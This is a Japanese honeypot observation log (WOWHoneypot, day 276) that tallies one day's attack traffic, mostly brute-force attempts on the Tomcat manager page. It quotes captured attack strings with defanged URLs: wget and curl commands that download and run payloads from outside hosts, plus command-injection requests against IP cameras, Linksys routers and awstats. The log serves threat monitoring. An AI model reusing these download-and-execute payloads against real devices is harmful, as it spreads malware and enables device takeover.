WOWHoneypot観察(276日目)
2019/12/17(火)
トータルは4129件でした。
ハンティングログは以下です。
208.97.139[.]112 wget hxxp[:]//80.82.64.14/richard; curl -O hxxp[:]//80.82.64[.]14/richard |
208.97.139[.]112 curl -O hxxp[:]//80.82.64[.]14/richard |
185.199.26[.]162 wget+hxxp[:]//ardp[.hldns[.]ru/loligang.mpsl |
170.78.247[.]22 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b |
208.113.204[.]109 wget hxxp[:]//145.249.106[.]241/richard; curl -O hxxp[:]//145.249.106[.]241/richard |
208.113.204[.]109 curl -O hxxp[:]//145.249.106[.]241/richard |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト | |
---|---|---|---|
4083 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html | |
38 | アクセス | GET / | |
2 | IPカメラの脆弱性を狙った通信 | GET /cgi-bin/operator/servetest?cmd=wget%20hxxp[:]//80.82.64.14/richard;%20curl%20-O%20hxxp[:]//80.82.64.14/richard;%20chmod%20+x%20richard;%20sh%20richard | |
1 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi | |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList | |
1 | 調査 | GET /version | |
1 | AWSのリモート実行の攻撃 | GET /cgi-bin/awstats.pl?configdir= | echo;echo%20YYY;wget%20hxxp[:]//145.249.106.241/richard;%20curl%20-O%20hxxp[:]//145.249.106.241/richard;%20chmod%20+x%20richard;%20sh%20richard;echo%20YYY;echo |
1 | Microsoft Sharepointの脆弱性を狙った通信 | GET /Temporary_Listen_Addresses/WSMAN | |
1 | 管理者情報の調査 | GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin |